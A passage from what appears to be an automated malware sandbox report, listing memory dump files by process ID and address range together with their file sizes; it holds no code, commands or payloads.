                        • memory/3544-6824-0x00000000006B0000-0x00000000012C8000-memory.dmp

                          Filesize

                          12.1MB

                        • memory/3544-7575-0x00000000004D0000-0x0000000000942000-memory.dmp

                          Filesize

                          4.4MB

                        • memory/3544-6716-0x00000000006B0000-0x00000000012C8000-memory.dmp

                          Filesize

                          12.1MB

                        • memory/3848-1082-0x0000000005810000-0x00000000058D4000-memory.dmp

                          Filesize

                          784KB

                        • memory/3848-1079-0x00000000013A0000-0x00000000013F6000-memory.dmp

                          Filesize

                          344KB

                        • memory/3848-1421-0x0000000006AF0000-0x0000000006BD8000-memory.dmp

                          Filesize

                          928KB

                        • memory/3848-1163-0x0000000006380000-0x00000000063E6000-memory.dmp

                          Filesize

                          408KB

                        • memory/4308-201-0x000002099C820000-0x000002099C838000-memory.dmp

                          Filesize

                          96KB

                        • memory/4444-164-0x000002564EEC0000-0x000002564EEE2000-memory.dmp

                          Filesize

                          136KB

                        • memory/4600-204-0x0000000000400000-0x0000000000464000-memory.dmp

                          Filesize

                          400KB

                        • memory/4600-205-0x0000000000400000-0x0000000000464000-memory.dmp

                          Filesize

                          400KB

                        • memory/5572-3672-0x0000000005D20000-0x0000000005E00000-memory.dmp

                          Filesize

                          896KB

                        • memory/5572-1570-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1555-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1554-0x0000000005810000-0x00000000058A6000-memory.dmp

                          Filesize

                          600KB

                        • memory/5572-1576-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1552-0x0000000000400000-0x0000000000460000-memory.dmp

                          Filesize

                          384KB

                        • memory/5572-1588-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-3644-0x00000000059D0000-0x0000000005A1C000-memory.dmp

                          Filesize

                          304KB

                        • memory/5572-3643-0x00000000058D0000-0x00000000058FC000-memory.dmp

                          Filesize

                          176KB

                        • memory/5572-1598-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1594-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1558-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1560-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-6732-0x00000000063D0000-0x0000000006462000-memory.dmp

                          Filesize

                          584KB

                        • memory/5572-6744-0x0000000007060000-0x00000000070B0000-memory.dmp

                          Filesize

                          320KB

                        • memory/5572-6745-0x0000000007010000-0x0000000007022000-memory.dmp

                          Filesize

                          72KB

                        • memory/5572-1562-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1602-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1564-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1600-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1596-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1566-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1568-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1556-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1592-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1572-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1590-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1586-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1584-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1582-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1580-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1579-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/5572-1574-0x0000000005810000-0x00000000058A1000-memory.dmp

                          Filesize

                          580KB

                        • memory/6100-7121-0x0000000000690000-0x0000000000D3F000-memory.dmp

                          Filesize

                          6.7MB

                        • memory/6100-7107-0x0000000000690000-0x0000000000D3F000-memory.dmp

                          Filesize

                          6.7MB

                        • memory/6228-7130-0x00000000007D0000-0x0000000000AC9000-memory.dmp

                          Filesize

                          3.0MB

                        • memory/6228-7118-0x00000000007D0000-0x0000000000AC9000-memory.dmp

                          Filesize

                          3.0MB

                        • memory/6228-7015-0x00000000007D0000-0x0000000000AC9000-memory.dmp

                          Filesize

                          3.0MB

                        • memory/6796-7138-0x0000000000F80000-0x000000000143A000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/6796-7128-0x0000000000F80000-0x000000000143A000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/7032-6782-0x0000000000AF0000-0x0000000000B54000-memory.dmp

                          Filesize

                          400KB

                        • memory/7040-3654-0x0000000000270000-0x000000000071D000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/7040-3317-0x0000000000270000-0x000000000071D000-memory.dmp

                          Filesize

                          4.7MB

                        • memory/7320-6831-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB

                        • memory/7320-6825-0x0000000000CD0000-0x00000000011B2000-memory.dmp

                          Filesize

                          4.9MB